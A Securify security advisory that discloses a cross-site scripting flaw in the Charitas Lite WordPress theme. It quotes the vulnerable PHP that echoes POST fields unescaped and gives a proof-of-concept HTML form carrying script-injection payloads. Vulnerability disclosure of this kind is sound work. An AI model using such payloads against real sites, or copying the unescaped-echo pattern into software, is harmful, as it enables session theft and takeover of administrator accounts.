Security Bughunt

2017 - August - Amsterdam

2017 Target - IoT


#sumofpwn
Go to all WP advisories

Antonis Manaras - Securify, March 2017

Cross-Site Scripting in Charitas Lite WordPress Theme

Abstract

A Cross-Site Scripting vulnerability was found in the Charitas Lite WordPress Theme. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure a logged on WordPress Administrator into opening a malicious website (or advertisement).

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160725-0001

Tested versions

This issue was successfully tested on version 1.0.5 of the Charitas Lite WordPress Theme.

Fix

There is currently no fix available.

Introduction

Charitas Lite is a simple and clean but still professional theme that is best suited for charities, NGOs (Non-governmental organization), foundations, churches, political organizations etcetera. A Cross-Site Scripting vulnerability was found in the Charitas Lite WordPress Theme. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.

Details

A Cross-Site Scripting vulnerability exists in the Charitas Lite WordPress theme. This issue exists due to the fact that the theme uses several parameters from a POST request without applying output encoding. Furthermore the affected code is not protected with an anti-Cross-Site Request Forgery token.

The vulnerable code in the charitas-lite/template-contact.php file is listed below:

<input  type="text" name="contactName" value="<?php if(isset($_POST['contactName'])) 

   echo $_POST['contactName'];?>" placeholder="<?php _e( 'Your Nam    e *', 'charitas' ); ?>" required/>

<input type="tel" name="phone" value="<?php if(isset($_POST['phone']))  

   echo $_POST['phone'];?>" placeholder="<?php _e( 'Phone Number', 'charitas' )    ; ?>" />

Proof of concept

<html>

   <body>

      <form action="http://<target>/contact/" method="POST">

         <input type="hidden" name="contactName" value="&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />

         <input type="hidden" name="phone" value="&quot;&gt;&lt;script&gt;alert&#40;2&#41;&lt;&#47;script&gt;" />

         <input type="submit" value="Submit request" />

      </form>

   </body>

</html>